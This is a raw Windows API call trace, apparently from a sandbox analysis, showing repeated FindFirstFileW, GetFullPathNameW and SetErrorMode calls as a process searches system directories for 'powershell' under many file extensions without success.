	[0693.506] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.514] SetErrorMode (uMode=0x1) returned 0x1
	[0693.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0693.515] SetErrorMode (uMode=0x1) returned 0x1
	[0693.516] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0693.516] SetErrorMode (uMode=0x1) returned 0x1
	[0693.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0700.063] SetErrorMode (uMode=0x1) returned 0x1
	[0702.332] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.332] SetErrorMode (uMode=0x1) returned 0x1
	[0702.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.332] SetErrorMode (uMode=0x1) returned 0x1
	[0702.333] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.333] SetErrorMode (uMode=0x1) returned 0x1
	[0702.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.333] SetErrorMode (uMode=0x1) returned 0x1
	[0702.333] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.334] SetErrorMode (uMode=0x1) returned 0x1
	[0702.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.334] SetErrorMode (uMode=0x1) returned 0x1
	[0702.334] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.334] SetErrorMode (uMode=0x1) returned 0x1
	[0702.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.335] SetErrorMode (uMode=0x1) returned 0x1
	[0702.335] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.335] SetErrorMode (uMode=0x1) returned 0x1
	[0702.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.335] SetErrorMode (uMode=0x1) returned 0x1
	[0702.335] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.336] SetErrorMode (uMode=0x1) returned 0x1
	[0702.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.336] SetErrorMode (uMode=0x1) returned 0x1
	[0702.336] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.336] SetErrorMode (uMode=0x1) returned 0x1
	[0702.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.337] SetErrorMode (uMode=0x1) returned 0x1
	[0702.337] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.337] SetErrorMode (uMode=0x1) returned 0x1
	[0702.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.337] SetErrorMode (uMode=0x1) returned 0x1
	[0702.338] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.338] SetErrorMode (uMode=0x1) returned 0x1
	[0702.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.338] SetErrorMode (uMode=0x1) returned 0x1
	[0702.338] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.339] SetErrorMode (uMode=0x1) returned 0x1
	[0702.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.339] SetErrorMode (uMode=0x1) returned 0x1
	[0702.339] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.339] SetErrorMode (uMode=0x1) returned 0x1
	[0702.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.340] SetErrorMode (uMode=0x1) returned 0x1
	[0702.340] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.340] SetErrorMode (uMode=0x1) returned 0x1
	[0702.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.340] SetErrorMode (uMode=0x1) returned 0x1
	[0702.340] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.341] SetErrorMode (uMode=0x1) returned 0x1
	[0702.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0702.341] SetErrorMode (uMode=0x1) returned 0x1
	[0702.341] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.341] SetErrorMode (uMode=0x1) returned 0x1
	[0702.342] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.342] SetErrorMode (uMode=0x1) returned 0x1
	[0702.342] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.342] SetErrorMode (uMode=0x1) returned 0x1
	[0702.342] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.342] SetErrorMode (uMode=0x1) returned 0x1
	[0702.343] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.343] SetErrorMode (uMode=0x1) returned 0x1
	[0702.343] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.343] SetErrorMode (uMode=0x1) returned 0x1
	[0702.343] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.343] SetErrorMode (uMode=0x1) returned 0x1
	[0702.344] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.344] SetErrorMode (uMode=0x1) returned 0x1
	[0702.344] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.344] SetErrorMode (uMode=0x1) returned 0x1
	[0702.344] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.344] SetErrorMode (uMode=0x1) returned 0x1
	[0702.344] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.345] SetErrorMode (uMode=0x1) returned 0x1
	[0702.345] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.345] SetErrorMode (uMode=0x1) returned 0x1
	[0702.345] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.345] SetErrorMode (uMode=0x1) returned 0x1
	[0702.345] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.345] SetErrorMode (uMode=0x1) returned 0x1
	[0702.346] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.346] SetErrorMode (uMode=0x1) returned 0x1
	[0702.346] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.346] SetErrorMode (uMode=0x1) returned 0x1
	[0702.346] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.346] SetErrorMode (uMode=0x1) returned 0x1
	[0702.347] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.347] SetErrorMode (uMode=0x1) returned 0x1
	[0702.347] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.347] SetErrorMode (uMode=0x1) returned 0x1
	[0702.347] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.347] SetErrorMode (uMode=0x1) returned 0x1
	[0702.347] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.348] SetErrorMode (uMode=0x1) returned 0x1
	[0702.348] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.348] SetErrorMode (uMode=0x1) returned 0x1
	[0702.348] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.348] SetErrorMode (uMode=0x1) returned 0x1
	[0702.349] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.349] SetErrorMode (uMode=0x1) returned 0x1
	[0702.349] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.349] SetErrorMode (uMode=0x1) returned 0x1
	[0702.349] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.349] SetErrorMode (uMode=0x1) returned 0x1
	[0702.349] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.352] SetErrorMode (uMode=0x1) returned 0x1
	[0702.353] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.353] SetErrorMode (uMode=0x1) returned 0x1
	[0702.353] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.353] SetErrorMode (uMode=0x1) returned 0x1
	[0702.353] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0702.353] SetErrorMode (uMode=0x1) returned 0x1
	[0702.353] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c83d8a0 | out: lpFindFileData=0x1c83d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0702.354] SetErrorMode (uMode=0x1) returned 0x1
	[0702.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0702.354] SetErrorMode (uMode=0x1) returned 0x1
